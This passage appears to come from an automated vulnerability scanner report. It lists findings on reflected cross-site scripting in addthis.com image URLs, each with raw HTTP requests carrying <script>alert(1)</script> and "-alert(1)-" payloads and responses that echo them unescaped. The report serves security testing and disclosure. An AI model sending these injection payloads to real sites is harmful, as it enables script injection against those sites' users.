Proxy-Connection: Keep-Alive
Host: www.addthis.com

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 03:54:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=ovr46vn4n37hfaa2649lk21412; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 1424

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/images4/internet_explorerd5f3c"-alert(1)-"7b34116a1a8/borderBottomCenter.png";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._setCustomVar(1,"Login","Fa
...[SNIP]...

2.68. http://www.addthis.com/images4/internet_explorer/borderBottomCenter.png [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/images4/internet_explorer/borderBottomCenter.png

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 768fe<script>alert(1)</script>7f11605211b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images4/internet_explorer768fe<script>alert(1)</script>7f11605211b/borderBottomCenter.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.addthis.com

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 03:54:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Set-Cookie: PHPSESSID=lcmfas1b0qj3tvf36daqr5nmo4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f0232:0; path=/
Content-Length: 1450

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>images4/internet_explorer768fe<script>alert(1)</script>7f11605211b/borderBottomCenter.png</strong>
...[SNIP]...

2.69. http://www.addthis.com/images4/internet_explorer/borderBottomCenter.png [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/images4/internet_explorer/borderBottomCenter.png

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 22237<script>alert(1)</script>1b752fcddb7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images4/internet_explorer/borderBottomCenter.png22237<script>alert(1)</script>1b752fcddb7 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.addthis.com

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 03:54:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Set-Cookie: PHPSESSID=5b6pblggsvj6sgobodeoee25l0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f0232:0; path=/
Content-Length: 1450

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>images4/internet_explorer/borderBottomCenter.png22237<script>alert(1)</script>1b752fcddb7</strong>
...[SNIP]...

2.70. http://www.addthis.com/images4/internet_explorer/borderBottomCenter.png [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/images4/internet_explorer/borderBottomCenter.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aef02"-alert(1)-"941be8f2aa3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /images4/internet_explorer/borderBottomCenter.pngaef02"-alert(1)-"941be8f2aa3 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.addthis.com

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 03:54:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Set-Cookie: PHPSESSID=07hnmfvkc3r30m7bm48hspvhm7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f0232:0; path=/
Content-Length: 1424

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/images4/internet_explorer/borderBottomCenter.pngaef02"-alert(1)-"941be8f2aa3";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._setCustomVar(1,"Login","False",2);
gaPageTrac
...[SNIP]...

2.71. http://www.addthis.com/images4/internet_explorer/borderBottomCenter.png [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/images4/internet_explorer/borderBottomCenter.png

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e1177<script>alert(1)</script>63b9825bd6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images4/internet_explorer/borderBottomCenter.png?e1177<script>alert(1)</script>63b9825bd6=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.addthis.com

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 03:54:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=v42gftvac3a5q0h9mev1lnfg40; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 1411

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>images4/internet_explorer/borderBottomCenter.png?e1177<script>alert(1)</script>63b9825bd6=1</strong>
...[SNIP]...

2.72. http://www.addthis.com/images4/internet_explorer/borderBottomLeft.png [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/images4/internet_explorer/borderBottomLeft.png

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7b003"-alert(1)-"9f65c990ece was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /images47b003"-alert(1)-"9f65c990ece/internet_explorer/borderBottomLeft.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.addthis.com

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 03:54:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=q0f9ruhj27dkslcu6d5094n654; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 1420

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/images47b003"-alert(1)-"9f65c990ece/internet_explorer/borderBottomLeft.png";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._setCustomV
...[SNIP]...

2.73. http://www.addthis.com/images4/internet_explorer/borderBottomLeft.png [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/images4/internet_explorer/borderBottomLeft.png

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload cae01<script>alert(1)</script>d2c35a74aa0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images4cae01<script>alert(1)</script>d2c35a74aa0/internet_explorer/borderBottomLeft.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.addthis.com

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 03:54:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Set-Cookie: PHPSESSID=h079rv0evjakdvae4ptgmd6bl5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f0232:0; path=/
Content-Length: 1446

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>images4cae01<script>alert(1)</script>d2c35a74aa0/internet_explorer/borderBottomLeft.png</strong>
...[SNIP]...

2.74. http://www.addthis.com/images4/internet_explorer/borderBottomLeft.png [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/images4/internet_explorer/borderBottomLeft.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 131e4"-alert(1)-"1ec6468ed32 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /images4/internet_explorer131e4"-alert(1)-"1ec6468ed32/borderBottomLeft.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.addthis.com

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 03:54:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Set-Cookie: PHPSESSID=kf2uisip176oemrr59spfahur5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f0232:0; path=/
Content-Length: 1420

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/images4/internet_explorer131e4"-alert(1)-"1ec6468ed32/borderBottomLeft.png";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._setCustomVar(1,"Login","Fals
...[SNIP]...

2.75. http://www.addthis.com/images4/internet_explorer/borderBottomLeft.png [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/images4/internet_explorer/borderBottomLeft.png

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 151bb<script>alert(1)</script>256cde2b0d1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images4/internet_explorer151bb<script>alert(1)</script>256cde2b0d1/borderBottomLeft.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.addthis.com

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 03:54:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Set-Cookie: PHPSESSID=ti4lrl3br1uuj7kt9c2mf2rfk4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f0232:0; path=/
Content-Length: 1446

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>images4/internet_explorer151bb<script>alert(1)</script>256cde2b0d1/borderBottomLeft.png</strong>
...[SNIP]...

2.76. http://www.addthis.com/images4/internet_explorer/borderBottomLeft.png [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/images4/internet_explorer/borderBottomLeft.png

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 1f82b<script>alert(1)</script>e7edaf0363d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images4/internet_explorer/borderBottomLeft.png1f82b<script>alert(1)</script>e7edaf0363d HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.addthis.com

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 03:54:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=ipfuofr6n7fgbgvd0gnvai0u54; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 1446

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>images4/internet_explorer/borderBottomLeft.png1f82b<script>alert(1)</script>e7edaf0363d</strong>
...[SNIP]...

2.77. http://www.addthis.com/images4/internet_explorer/borderBottomLeft.png [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/images4/internet_explorer/borderBottomLeft.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 44185"-alert(1)-"ee6733aeb80 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /images4/internet_explorer/borderBottomLeft.png44185"-alert(1)-"ee6733aeb80 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.addthis.com

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 03:54:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Set-Cookie: PHPSESSID=slvup7p83n6mlm7hm0q1uicqq7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f0232:0; path=/
Content-Length: 1420

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/images4/internet_explorer/borderBottomLeft.png44185"-alert(1)-"ee6733aeb80";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._setCustomVar(1,"Login","False",2);
gaPageTrac
...[SNIP]...

2.78. http://www.addthis.com/images4/internet_explorer/borderBottomLeft.png [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/images4/internet_explorer/borderBottomLeft.png

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 2f1e7<script>alert(1)</script>3cc91de6764 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images4/internet_explorer/borderBottomLeft.png?2f1e7<script>alert(1)</script>3cc91de6764=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.addthis.com

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 03:54:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Set-Cookie: PHPSESSID=4nmsncmrgamcj2pdpkn9fnhnb6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f0232:0; path=/
Content-Length: 1408

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>images4/internet_explorer/borderBottomLeft.png?2f1e7<script>alert(1)</script>3cc91de6764=1</strong>
...[SNIP]...

2.79. http://www.addthis.com/images4/internet_explorer/borderBottomRight.png [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/images4/internet_explorer/borderBottomRight.png

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a41c2"-alert(1)-"4c7c1fad37a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /images4a41c2"-alert(1)-"4c7c1fad37a/internet_explorer/borderBottomRight.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.addthis.com

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 03:54:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=evlpbk4iat6n6r1n7sen6pq2j7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 1422

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/images4a41c2"-alert(1)-"4c7c1fad37a/internet_explorer/borderBottomRight.png";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._setCustom
...[SNIP]...

2.80. http://www.addthis.com/images4/internet_explorer/borderBottomRight.png [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/images4/internet_explorer/borderBottomRight.png

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload eca39<script>alert(1)</script>59033d0dbb6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images4eca39<script>alert(1)</script>59033d0dbb6/internet_explorer/borderBottomRight.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.addthis.com

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 03:54:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Set-Cookie: PHPSESSID=gj0puni59fau0lht1ggvu5hin1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f0232:0; path=/
Content-Length: 1448

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>images4eca39<script>alert(1)</script>59033d0dbb6/internet_explorer/borderBottomRight.png</strong>
...[SNIP]...

2.81. http://www.addthis.com/images4/internet_explorer/borderBottomRight.png [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/images4/internet_explorer/borderBottomRight.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c1c8f"-alert(1)-"88c97b7d32c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /images4/internet_explorerc1c8f"-alert(1)-"88c97b7d32c/borderBottomRight.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.addthis.com

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 03:54:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Set-Cookie: PHPSESSID=ev6mjdno9id1gof843ulh0v4o5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f0232:0; path=/
Content-Length: 1422

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/images4/internet_explorerc1c8f"-alert(1)-"88c97b7d32c/borderBottomRight.png";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._setCustomVar(1,"Login","Fal
...[SNIP]...

2.82. http://www.addthis.com/images4/internet_explorer/borderBottomRight.png [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/images4/internet_explorer/borderBottomRight.png

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c33dd<script>alert(1)</script>b0dbb3e2827 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images4/internet_explorerc33dd<script>alert(1)</script>b0dbb3e2827/borderBottomRight.png HTTP/1.1
Accept: */*
Accept-Language: en-US
